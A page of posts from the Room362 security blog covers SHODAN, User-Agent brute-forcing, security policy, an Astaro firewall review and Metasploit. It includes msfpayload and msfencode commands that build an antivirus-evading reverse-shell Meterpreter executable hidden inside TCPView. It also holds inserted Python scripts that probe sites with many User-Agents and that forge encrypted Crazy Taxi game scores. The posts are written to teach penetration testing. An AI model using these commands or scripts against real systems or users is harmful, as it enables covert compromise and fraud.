Room362.com

Blatherings of a security addict.

SHODAN the Computer Search


If you haven’t seen it all over twitter yet, achillean released the “beta” of SHODAN yesterday. It’s essentially a search engine over an nmap of the internet (ports 21, 22, 23 or 80 so far), indexing the banners those services return.

http://shodan.surtri.com/

You can search by keyword, and/or using any of the advanced search options.

  • country: 2-letter country code
  • hostname: full or partial host name
  • net: IP range using CIDR notation (ex: 18.7.7.0/24 )
  • port: 21, 22, 23 or 80

Here is just a taste of the power this brings to the game:

Let your mind run wild. I imagine this search engine will do nothing but grow. Remember, as with any service, your searches are happening on someone else’s servers: be gentle (it’s free.. right now) and be wary, since you don’t want to put too much data about a customer into somebody else’s query logs ;–)

Thanks go to HD Moore for the heads up about the service, and Thierry Zoller for adding flame to the fire of crazy searches to try on this new service.

Brute-Forcing Compatibility


Idea came thanks to cktricky from: http://cktricky.blogspot.com/

A bunch of sites on the web give you different pages depending on the browser you use to view them. I know when I was a web developer compatibility was the bane of my existence, as I’m sure it still is for all the web devs out there. Sometimes this leads to bad coding practices, or even the old “Google Bot gets to see everything” feature. So I had an idea: take Burp’s Intruder and “brute force” any compatibility coding that a site may have, especially when there is a restricted section of the site that you know is there but don’t have access to.

To start off you need a list of user agents. I pulled mine from the User-Agent Switcher lists I found on the web since they are in easily parsed XML.

From: Qainsight’s UA Lists.

I downloaded: http://qainsight.net/content/binary/AgentStrings20070517.xml

There are plenty of ways to parse XML in your scripting language of choice, but here is some dirty bash that worked for me (the field number in the awk depends on the attribute order in that particular file, so check a few lines of the output):

grep 'useragent=' AgentStrings20070517.xml | grep -v '\*' | awk -F '"' '{print $4}' > useragents.txt

Next, we set up our Intruder instance, with the value of the User-Agent header marked as the only payload position:

And import useragents.txt into Intruder and kick it off.

If any of the ‘payloads’ come back with anything different (status code, response length or content), it’s definitely something to look into.
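The same idea, scripted: an added example (not from the original post, and not Burp) that parses a User-Agent Switcher style XML list, sends every user agent to a fetch function and reports the ones whose response differs from the majority. The XML snippet and the stand-in server below are constructed for the demo; the real AgentStrings file and any real target are not reproduced here.

```python
"""Brute-force User-Agent based content switching (added example).

Parses a User-Agent Switcher style XML list, fetches a page once per UA
and reports the UAs whose response differs from the most common one.
"""
import hashlib
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed sample in the shape of a User-Agent Switcher export; the real
# AgentStrings file from the post is not reproduced here.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<useragentswitcher>
  <folder description="Browsers">
    <useragent description="Firefox 3.0 (Windows)" useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"/>
    <useragent description="IE 7 (Windows)" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"/>
  </folder>
  <folder description="Spiders">
    <useragent description="Googlebot" useragent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"/>
    <useragent description="Any (wildcard)" useragent="*"/>
  </folder>
</useragentswitcher>
"""


def load_user_agents(xml_text):
    """Return every 'useragent' attribute, skipping wildcard entries
    (the same filtering the page's grep -v '*' does)."""
    root = ET.fromstring(xml_text)
    agents = []
    for node in root.iter("useragent"):
        ua = node.get("useragent", "").strip()
        if ua and "*" not in ua:
            agents.append(ua)
    return agents


def fingerprint(status, body):
    """Cheap response fingerprint: status, length and a body hash.
    Two responses with the same fingerprint are treated as the same page."""
    digest = hashlib.sha256(body).hexdigest()[:16]
    return (status, len(body), digest)


def http_fetch(url, timeout=10):
    """Build a fetch callable that requests url with a given User-Agent."""
    def fetch(user_agent):
        req = Request(url, headers={"User-Agent": user_agent})
        try:
            with urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except HTTPError as exc:  # a 403/404 body is still a signal
            return exc.code, exc.read()
    return fetch


def find_outliers(fetch, user_agents):
    """Fetch once per UA and return {ua: fingerprint} for every UA whose
    response differs from the most common fingerprint (the 'normal' page)."""
    results = {ua: fingerprint(*fetch(ua)) for ua in user_agents}
    baseline, _ = Counter(results.values()).most_common(1)[0]
    return {ua: fp for ua, fp in results.items() if fp != baseline}


def demo_server(user_agent):
    """Constructed stand-in for a site with 'crawlers see everything' logic."""
    if "Googlebot" in user_agent:
        return 200, b"<html>public area <a href='/members/reports'>reports</a></html>"
    return 200, b"<html>public area</html>"


if __name__ == "__main__":
    uas = load_user_agents(SAMPLE_XML)
    for ua, fp in find_outliers(demo_server, uas).items():
        print(fp, ua)
    # Against a real target (assumed URL): find_outliers(http_fetch("http://target/page"), uas)
```

Comparing against the majority fingerprint rather than a single baseline browser means a site that serves a special page to one crawler shows up as exactly one outlier; if the page contains a timestamp or CSRF token, strip it before hashing or every UA will look different.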

Stop Blaming the Admins!


We (the security community) all know, and make fun of, “Users” and “Admins”. They are derogatory terms in our community, so much so that they could almost be classified as curse words. (I can see the XKCD now: Security stick figure talking to IT stick figure. “You stupid A****”).

While I don’t discount their “contribution” to making my day fun, I feel that a lot of people miss an even bigger threat: Policies and Procedures, or SOPs (Standard Operating Procedures). Those words are virtual kryptonite to anyone in IT, more so to ‘security professionals’.

But what makes them a threat? Two things:

  1. Everyone hates them, so they are rarely updated (you know.. like Windows.. stay with me)
  2. Even the ones that are updated are sometimes written poorly, or actually create vulnerabilities.

For example: let’s make all the local admin passwords something really difficult and long, and… all the same, so that we can easily administer every machine. That makes updates and group policy go smoothly… Oh wait, we don’t have those problems anymore (or at least they aren’t based on local authentication issues). What the policy does do is hand whoever recovers that one password from one box every other box on the network.

Now, policies and documented procedures are good things. I’m not saying they aren’t. What I am saying is that blindly following a documented procedure because “the guy that trained me said so” just doesn’t cut it.

Admins: Challenge that policy, find out the reason why you do what they want you to do. The worst that could happen is you could learn something new. The best is that you could change your company’s security posture for the better.

Security Pros: Time to get off your A**** and update the wiki! (or the doc/site/binder) so that your successor, or someone new to your team, can hit the ground running.

I also challenge you to look at internet policies/procedures… oh wait.. they call those features.

A Simplified Astaro UTM Now FREE to Businesses


Disclaimer: I was given a demo license of the new free business product to break/review. No money has traded hands. This is my brutally honest opinion of the product.

I’ve played with a gamut of Astaro products, and personally I really hate UTMs, just like I hate All-In-One Printer/Copier/Faxes: one thing breaks, they all do. But before I go into my opinions of the product, or get on any soap box, here are the facts:

  1. Astaro Security Gateway was free for home use already

    • (works awesome for VM demos)
  2. As of November 16th 2009, Astaro Security Gateway “Essential Firewall Edition” is FREE to any business that wants to run a copy.

    • Essential Firewall Edition is basically an enterprise-grade firewall w/ VPN and some reporting.

Why I like this product is not because it’s Astaro, but because it’s the bare essentials. It’s exactly what a small to mid-size business needs so that you stop getting calls from your friend at 5 AM asking why the Linksys you put DD-WRT on to be slick is down.

There is no better gift you can give a business as an IT/Security guy than the ability to see and log. Test it out; you’ll be amazed at what you see on your network.

Like I said initially, this is a brutally honest post, and I wholeheartedly believe in FREE and in one tool for one job. However, so far it’s been all fluff and daisies. In coming posts, I’ll show how it and other free alternatives break, or stand up, from an attack point of view.

On a side note, it works flawlessly with the iPhone ;–) Use public wifi with less fear, with all of your traffic going through the VPN automagically. That’ll make the boss happy.

Why Room362?


(This post got lost in the intertubes and it took a bit to get back, Archive.org nor Google cache had it)

I get this question all the time: “Why room362.com?” I have answered that question in a lot of ways, depending on the perceived amount of time I had to tell the story. But, on a blog you have tons of time, right? Not if you are studying the Twitter boom. Anyways, this is the semi-brief-long version that won’t bore you to death like this intro is:

It all started with a desk of multiplying pizzas…

In 29 Palms, California, there is a Marine base. I was stationed there for a couple of months during some training, and one night a group of us decided to stage a LANPARTY. Easier said than done when most of the Marines in the area were only there for a short while as well and didn’t want to bring desktops or chance laptops in the sandy desert. But we pulled it off. We had about 8-10 players at any given time and people were playing everything from Quake3 to Lightbikes 2.

And that was that; there really isn’t much excitement to be had in a desert. However, there was one thing that the LAN party caused: an increased interest in how ‘domains’ worked in my roommate. He asked how to register a domain and I took him through the whole process, set up my dinky 1.4GHz Celeron laptop as a Windows 2003 server acting as a Domain Controller with Exchange 2003 installed on it (yes I know..). But he was stuck on choosing a name for the domain.

Being the impatient person that I am, I got fed up and just named it after the room number we were staying in. And so Room362.com was born. 24 hours later, Room362.com was on every single spammer RBL on the planet. Why? Because there was at the time a default switch that made Exchange 2003 an open relay. Learned a lot that summer. Going forward it’s just been “my domain”; my roommate sure didn’t want it since it was “totally blocked from everything”. Been here ever since. Welcome to my room.

Room362.com Logo in 2005:

Metasploit Blends in: New MSFPayload/ENcode


In revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.

But before I get into the new feature, let’s quickly go over the standard way you use msfencode:

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) 

root@bt4:/pentest/exploits/framework3#

We just used MSFPAYLOAD to output a reverse TCP Meterpreter payload in [R]aw format. We then piped it into MSFENCODE so that we could output it as a proper Windows executable (/tmp/bob.exe), encoded to get past signature-based AV detection.

Now, if you knew where it was (data/templates/template.exe), you could just replace template.exe with the one you want loaded with the payload and call it a day. But then you wouldn’t get some of the tweaks that make this update awesome.

The update added the -x option to msfencode, which lets you specify an executable of your choosing to sacrifice to the gods. For example, with TCPView:

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) 

root@bt4:/pentest/exploits/framework3#

And if everything went well, we have a nice new executable in /tmp/ called Tcpview2.exe that still looks and runs like TCPView. Want to know the magic part? Try to tell them apart:

Getting Your N00b Fill of Security


Continuing my “Getting your fill of” series

Dave Shackleford recently posted an excellent blog entry titled “One for the n00bs”: http://daveshackleford.com/?p=277

It relates the security community to a high school cafeteria. It’s a good read and pretty dead on. I want to echo his sentiment, “I got my OWN lunch table. And you’re invited.” I’m just an email away. I also wanted to let you know there are a lot of places where you can learn on your own, at your own pace, and without any chance of ridicule. (well, maybe a little)

In no particular order:

  • Dan Guido’s Penetration Testing course at Poly U.

    • This mind-blowing set of videos (16 so far) is taught by the best in the biz. People pay out the nose for the information released in these videos. Get out your pen and paper, because from the time you press play you are going to be inundated with technical knowledge. (On the Vimeo site for each video you can even download the full thing for viewing on your i(Phone|Pod|Touch|Brain))

    • PRICE: FREE

  • SecurityTube

    • A consolidation of all the security /hacking related videos posted to the net. Their database of videos is massive.

    • PRICE: FREE

  • The Academy

    • Kinda like SecurityTube, but these videos are all professionally done by Peter Giannoulis and crew, and cover some of the big-iron security tools and appliances that you wouldn’t normally be able to get your hands on to play with. This is a great way to beef up your knowledge of a product that your potential employer is running (after you have cyber-stalked them: http://www.irongeek.com/i.php?page=security/how-to-cyberstalk-potential-employers). Or you just want to find out what that security guy from the other section installed in your rack.

    • PRICE: FREE (just have to sign up for a free account)

  • Metasploit Unleashed: Mastering the Framework by Offensive Security

    • This is the official documentation for the Metasploit Framework. It’s scenario driven, so it’s really easy to follow along.

    • PRICE: FREE (Videos and other materials are available for a donation to Hackers for Charity)

And I wouldn’t be doing my duty without showing you how to get more:

  • Vimeo search for Metasploit (you can even put it in your favorite feed reader): http://vimeo.com/videos/search:metasploit

  • Pretty much any video site (youtube, blip.tv, viddler) plus searches for metasploit or hacking will net you a bunch of videos. You’ll have to sift through some trash, but there are definitely some nuggets out there. Vimeo just seems the most noise free at the moment.

I hope this helps you at whatever stage you think you are at since we are all n00bs to an extent.

Other “Getting your fill of” series posts:

NoVA Hackers


I created a google group for the NoVA Hackers meetups (Formerly known as NoVASec Luncheons)

I have set some permissions on the group to maximize privacy while still allowing for interaction beyond me sending out BCC’d messages to everyone:

  • Private Invite Only – basically to keep spam out

  • Only Managers can view Member List – so those who don’t want their email addresses seen can join and just listen for announcements and regular message traffic

  • Managers and Members can invite – this allows for growth by word of mouth with little moderation ( I say little because I’ll still get emails when new users join )

If you are interested in joining please send me the email addresses you would like invited to the group to mubix@hak5.org

URL is http://groups.google.com/group/novahackers/

I will be doing all following announcements there.

Hacking Crazy Taxi


I had a bet with my friend about getting #1 on the Crazy Taxi high score page (== motivation for this post).

For those who have not been introduced to it yet, it’s a Facebook/Flash/2.0 resurrection of a much older game.

Not having extreme timing skills, I quickly gave up on getting the 2,000,000 points required to make it the “normal” way. My first try was modifying the outgoing HTTP traffic using the Tamper Data plugin for Firefox (to catch the obvious ones). The Crazy Taxi Flash does actually submit your score over HTTP in clear text (IIRC they have a reflected XSS there as well), but that GET parameter is only used for displaying a score; nothing is saved. By the looks of things, they seem to be RC4-encrypting the score as some sort of weak client-side anti-tamper protection. Singling out the request that submitted the score was no pain at all (it actually said “submitScore”); decompiling the Flash, however, was.

At first I tried flasm, but for some reason flasm went all bananas when confronted with the Crazy Taxi flash files, so I started sketching up a Flash / AS3 deobfuscator / decompiler with Frigolit. Then I realized that simply debugging the host process would be by far the fastest way to do it. I started out with setting my score to “6661337”, but someone had “beat” it the day after. I wanted to be on top, and I didn’t want to have to “maintain” my position. I wanted the maximum score, so that made me look into matters and discover that the score was stored in a signed double (I think they use PHP ;).

Here’s a video of me “achieving” 0x7fffffff points. A nice little thing is that if you go above 0x7fffffff (>= 0x80000000), the sign will flip and your numbers will “shrink” instead of growing. Damn, I would like to see the frustrated faces of all them other script kiddies when they sit at home trying to raise their scores and getting minus values instead :–)

Hacking Crazy Taxi from Joe Pragmatk on Vimeo.
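The two weaknesses the post relies on, as an added example that is a hypothetical reconstruction rather than Crazy Taxi’s real code: a score wrapped in RC4 under a key that has to ship inside the client, and a server that stores the decrypted value as a signed 32-bit integer (an assumption that matches the 0x7fffffff boundary observed above). The key, the score format and the server logic are all made up for the demo.

```python
"""RC4-wrapped score submission and signed 32-bit storage (added example).

Hypothetical reconstruction of the two weaknesses described above, not
Crazy Taxi's real code: a score encrypted with RC4 under a key that ships
in the client, and a server that stores the result as a signed 32-bit int.
"""
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# The key has to be inside the SWF for the client to encrypt at all, so
# anyone who decompiles or debugs the client has it too. (Constructed value.)
CLIENT_KEY = b"example-embedded-key"


def client_submit(score: int) -> bytes:
    """What the Flash client sends: RC4(key, decimal score string)."""
    return rc4(CLIENT_KEY, str(score).encode())


def to_signed32(value: int) -> int:
    """Emulate storing an integer in a signed 32-bit column or variable."""
    return struct.unpack("<i", struct.pack("<I", value & 0xFFFFFFFF))[0]


def server_store(blob: bytes) -> int:
    """Server side: decrypt, parse, store as signed 32-bit (e.g. a PHP int)."""
    plain = rc4(CLIENT_KEY, blob)
    return to_signed32(int(plain.decode()))


def forge_with_key(score: int) -> int:
    """Attacker who extracted the key submits any score at all."""
    return server_store(client_submit(score))


def forge_without_key(captured: bytes, known_score: int, wanted: int) -> int:
    """Attacker who never extracted the key but captured one submission whose
    plaintext they know: RC4 is XOR with a fixed keystream (no nonce here), so
    flipping plaintext bits is flipping ciphertext bits. Needs equal lengths."""
    old = str(known_score).encode()
    new = str(wanted).encode()
    if len(old) != len(new):
        raise ValueError("captured keystream only covers the captured length")
    patched = bytes(c ^ o ^ n for c, o, n in zip(captured, old, new))
    return server_store(patched)


if __name__ == "__main__":
    print("0x7fffffff stored as", forge_with_key(0x7FFFFFFF))
    print("0x80000000 stored as", forge_with_key(0x80000000))  # sign flips
    capture = client_submit(1234567)
    print("bit-flipped without key:", forge_without_key(capture, 1234567, 9999999))
```

Encryption under a key the client holds is not integrity protection: with the key you can submit anything, and even without it a stream cipher lets you rewrite a captured message bit for bit. A server that wants a trustworthy score has to compute or verify it itself (or at least MAC it with a key the client never sees), and it should reject values outside the range it stores instead of letting 0x80000000 turn into a negative number.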

APPLE: A Modern Day Willy Wonka Story


Yes, I just called everyone who works at Apple an Oompa Loompa, but I digress:

I was reading Brooke Crothers’ story on the Apple ‘gag’ order [1] and couldn’t help but think of how Apple has created an almost similar situation. Everyone wants to know what Apple is up to, and can’t stop talking about it. Buzz Out Loud [2] even had people call and email asking them to see if they could do a show without mentioning Apple or the iPhone. According to Brooke’s article, people are afraid for their very jobs (pun?) even at the mention of Apple. What’s behind the curtains at Apple? Is Steve Jobs going to send out 5 golden Apple Tablets? Probably not, but I can’t shake the image of Steve coming out on stage to do one of his presentations with a cane and doing a fake fall to the podium.

So I pose this crucial question to you, the reader: Who plays the part of Slugworth?

[1] http://news.cnet.com/8301-13924_3-10372535-64.html?part=rss&subj=news&tag=2547-1_3-0-20

[2] http://bol.cnet.com